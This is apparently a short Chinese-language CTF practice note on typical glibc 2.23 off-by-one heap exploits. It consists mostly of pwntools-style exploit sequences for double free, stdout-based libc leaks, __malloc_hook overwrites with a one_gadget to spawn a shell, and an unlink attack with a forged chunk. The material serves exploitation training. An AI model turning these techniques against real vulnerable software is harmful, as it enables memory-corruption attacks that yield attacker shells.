OFF-BY-ONE:TYPICAL
OFF BY ON 各类典型利用, 本篇非常水…为了恢复一下做题的手感。
Leak + Off By One
主要利用方式是:
- OFF BY ONE -> double free
add(0x400)#0 add(0x88)#1 add(0x88)#2 free(0) add(0x18)#0 edit(0,'A'*0x18) add(0x88)#3 add(0x88)#4 free(3) free(1) add(0x88) show(4) #get leak add(0x78) free(4) free(3) #double free
No Leak + Off By One
- off by one
- free chunk 4 into fastbin
- malloc 0x80 之后 free 为了留下libc地址
- malloc 0x200 Overlap partial write
- modify stdout to leak
- free chunk 4 into fastbin
- edit to write fd
- modify __malloc_hook
- double free to get_shell
add(0x400) add(0x88) add(0x88) free(0) add(0x18) edit(0,'\x00'*0x18) add(0x88) add(0x68) free(3) free(1) add(0x1f8)#1 free(4) add(0x88)#3 free(3) add(0x200)#3 edit(3,'\x00'*0x88+p64(0x71)+'\xdd\x25\n') add(0x68)#4 add(0x68)#5 edit(5,'\x00'*0x33+p64(0x1800)+'\x00'*0x19+'\n') p.read(0x40) base=u64(p.read(0x8))-(0x7ffff7dd2600-0x7ffff7a0d000) log.warning(hex(base)) free(4) libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so') libc.address=base one=base+0xf02a4 edit(3,'\x00'*0x88+p64(0x71)+p64(libc.sym['__malloc_hook']-35)+'\n') add(0x68)#4 add(0x68)#6 free(3) add(0x88) add(0x18) edit(6,'\x00'*19+p64(one)+'\n') free(7) free(4)
unlink
主要就是伪造堆块 前提是有edit功能和已知&ptr(没有pie或者泄漏了程序装载基址)
add(0x100)#0
add(0xf8)#1
p.readuntil("ss ")
pie=int(p.readline(),16)
log.warning(hex(pie))
add(0x1f8)#2
add(0x100)#3
pay=flat(1,0xf1,pie-0x18,pie-0x10)+'\x00'*0xd0+p64(0xf0)
edit(1,(pay))
free(2)